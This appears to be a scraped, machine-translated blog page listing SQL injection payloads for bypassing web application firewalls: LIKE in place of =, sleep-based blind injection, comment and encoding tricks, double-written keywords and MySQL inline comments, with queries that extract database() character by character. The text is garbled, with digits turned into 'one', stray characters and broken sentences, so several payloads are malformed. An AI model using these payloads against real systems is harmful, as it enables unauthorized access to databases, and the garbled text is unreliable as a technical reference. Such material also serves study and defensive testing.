![]() Like without wildcard can be used to replace =: Select * from cms_users where username like "admin" Like with wildcard normally: Select * from cms_users where username like "ad%" ![]() Like without wildcard has the same effect as =, so it can be used to bypass. Select * from cms_users where userid=1^sleep(5) Generally, there are several methods to bypass space filtering to replace spaces /**/ In keyword select * from cms_users where userid=1 and substr(database(),1,1) in ('c') īetween a and b: between a and b (excluding b) select * from cms_users where userid=1 and substr(database(),1,1) between 'a' and 'd' Otherwise, it returns 1 select * from cms_users where userid=1 and strcmp(ascii(substr(database(),0,1)),99) If the first parameter is less than the second according to the current classification order, it returns - 1. If all strings are the same, STRCMP() is returned. Greater (N one, N2, N3.): returns the maximum value in N or least(n one,n2,n3.): returns the minimum value in n select * from cms_users where userid=one and greatest(ascii(substr(database(),one,one)),one)=99 In sql blind note, the size is usually used to judge the size of ascii code value to achieve the blasting effect. Select * from users where username = 0x746573743 one īypass of some symbols by unicode encoding: Single quotation mark=> %u0037 %u02b9 Hex bypass: select * from users where username = test one Code bypassįor example, URLEncode, ASCII, hex and Unicode codes bypass:įull url encoding of keywords twice: one+and+one=2Īscii encoding bypass Test Equivalent to CHAR(one 0 one)+CHAR(97)+CHAR(one one 5)+CHAR(one one 6) ![]() For example, select becomes seleselect, and after waf processing, it becomes select, which meets the requirements of bypassing. In this case, the double write keyword can be used to bypass. In some simple WAFS, the keyword select is replaced with empty only by the replace() function. select * from cms_users where userid=one union /*!select*/ one,2,3 Inline annotation is to put some unique statements only on MYSQL in // In this way, these statements will not be executed in other databases, but will be executed in MYSQL. Generally, the topic is designed deliberately. ![]() It is often used when the regular of waf is not case sensitive. ![]()
0 Comments
Leave a Reply. |
Details
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |